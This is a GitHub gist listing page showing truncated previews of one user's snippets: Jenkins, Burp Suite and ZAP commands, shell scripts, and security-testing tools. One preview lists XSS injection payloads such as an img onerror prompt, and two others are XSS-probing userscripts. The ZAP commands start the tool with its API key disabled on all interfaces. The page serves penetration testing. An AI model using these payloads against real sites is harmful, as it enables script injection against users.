Thomas Hartmann thomashartm
thomashartm
/ Managing dockerized Jenkins
Created
January 9, 2019 09:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Based on https://jenkins.io/doc/book/installing/ | |
| # Download the container and start it | |
| docker run -u root --rm -d -p 8080:8080 -p 50000:50000 -v ${HOME}/projects/jenkins/home:/var/jenkins_home -v /var/run/docker.sock:/var/run/docker.sock jenkinsci/blueocean | |
| # View the logs | |
| docker logs jenkinsci/blueocean | |
| #Open a shell | |
| docker exec -it jenkinsci/blueocean bash |
thomashartm
/ DebugBurpSuite
Last active
January 22, 2023 03:05
Debug Burp Suite for Burp Extension Development
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd /Applications/Burp Suite Professional.app/Contents/java/app | |
| java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar burpsuite_pro.jar |
thomashartm
/ export-jenkins-plugins.sh
Created
May 7, 2018 08:45
Reads the jenkins plugins installed on an existing instance and exports the shortnames
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #################################### | |
| # Reads the jenkins plugins installed on an existing instance and exports the shortnames | |
| # run as follows: | |
| # export-jenkins-plugins.sh <server-adress> <username> | |
| # e.g. | |
| # export-jenkins-plugins.sh localhost:8080 admin | |
| # This command requires to install jq | |
| # https://stedolan.github.io/jq/download/ |
thomashartm
/ clean-stale-unmerged-branches.sh
Last active
April 5, 2018 08:42
Cleans up stale unmerged branches older then 4 months
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # vim: set ts=4 sw=4 expandtab tw=79 : | |
| #title :cleanup-stale-unmerged-branches.sh | |
| #description :This script cleans up all unmerged branches older then 4 months, except develop and master | |
| #author :[email protected] | |
| #date :2018-04-04 | |
| #version :0.1 | |
| #notes :initially based on https://gist.github.com/dominics/1762685 | |
| #usage :clean-stale-unmerged-branches.sh unmerged.txt |
thomashartm
/ Sling and AEM Maven Archtypes
Created
September 30, 2017 19:23
Sling related maven archytpes for creating a sling multi module maven project
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Multi Maven Module: | |
| mvn archetype:generate \ | |
| -DarchetypeGroupId=org.codehaus.mojo.archetypes \ | |
| -DarchetypeArtifactId=pom-root \ | |
| -DarchetypeVersion=RELEASE \ | |
| -DgroupId=biz.netcentric.sling \ | |
| -DartifactId=sling-multi-module-maven-project \ | |
| -Dversion=1.0.0-SNAPSHOT \ | |
| -DinteractiveMode=false |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First start zap locally. | |
| # Starts Zap in daemon mode listening on port 9999 bound to all interfaces with API key disabled | |
| ./zap.sh -daemon -host 0.0.0.0 -port 9999 -addoninstallall -config api.disablekey=true -config api.incerrordetails=true -config api.addrs.addr.name=.* -config api.addrs.addr.regex=true | |
| # Starts Zap UI listening on port 9999 bound to all interfaces with API key disabled | |
| ./zap.sh -host 0.0.0.0 -port 9999 -addoninstallall -config api.disablekey=true -config api.incerrordetails=true -config api.addrs.addr.name=.* -config api.addrs.addr.regex=true | |
| # Starts Zap in daemon mode listening on port 9999 bound to all interfaces with API key disabled and an http sender script enabled | |
| ./zap.sh -daemon -host 0.0.0.0 -port 9999 -addoninstallall -config api.disablekey=true -config api.incerrordetails=true -config script.scripts.name="SenderExample" -config script.scripts.engine="Oracle Nashorn" -config script.scripts.type=httpsender -config script.scripts.enabled=true -config script.scripts.file="scr |
thomashartm
/ Vagrantfile
Created
May 11, 2017 06:04
— forked from anthonysterling/Vagrantfile
Handy Vagrantfile for IE testing with Vagrant.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: IE={box} vagrant up | |
| # | |
| # Eg. IE=XPIE6 vagrant up | |
| boxes = { | |
| "XPIE6" => "http://aka.ms/vagrant-xp-ie6", | |
| "XPIE8" => "http://aka.ms/vagrant-xp-ie8", | |
| "VistaIE7" => "http://aka.ms/vagrant-vista-ie7", | |
| "Win7IE8" => "http://aka.ms/vagrant-win7-ie8", | |
| "Win7IE9" => "http://aka.ms/vagrant-win7-ie9", |
thomashartm
/ XSS vectors and filter evasion strings
Last active
August 8, 2025 20:13
Interesting XSS payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CUSTOM VECTORS | |
| "><img src=x onerror=prompt(1);> | |
| +123'];alert(1);[[' | |
| 123',alert(1),' | |
| 123\",term:alert(1)//\" |
thomashartm
/ jinxs2.user.js
Last active
April 30, 2017 16:49
Jinx 2.0 is a slightly adapted version of Martin Holst Swende's great GreaseMonkey script Jinx. Please see the visit the original code http://swende.se/projects/jinx.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name Jinx 2.0 | |
| // @namespace swende.se | |
| // @grant GM_registerMenuCommand | |
| // @description This is a slightly adapted version of Martin Holst Swende's great GM script Jinx. Please see the original code http://swende.se/projects/jinx.html | |
| // @version 1 | |
| // @include * | |
| // @require http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | |
| // ==/UserScript== | |
thomashartm
/ xssmonkey.user.js
Last active
October 21, 2024 09:53
XSS testing userscript for GreaseMonkey to for XSS issues with links and forms in a page. Based on ph3wl's XSS script.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name XSSMonkey | |
| // @namespace thartm | |
| // @description Identifies potential Cross Site Scripting (XSS) sinks in the currently displayed website and provides an easy option to probe them. Based on ph3wl's XSS script. | |
| // @include * | |
| // @require http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | |
| // ==/UserScript== | |
| // | |
| // Set your test string here |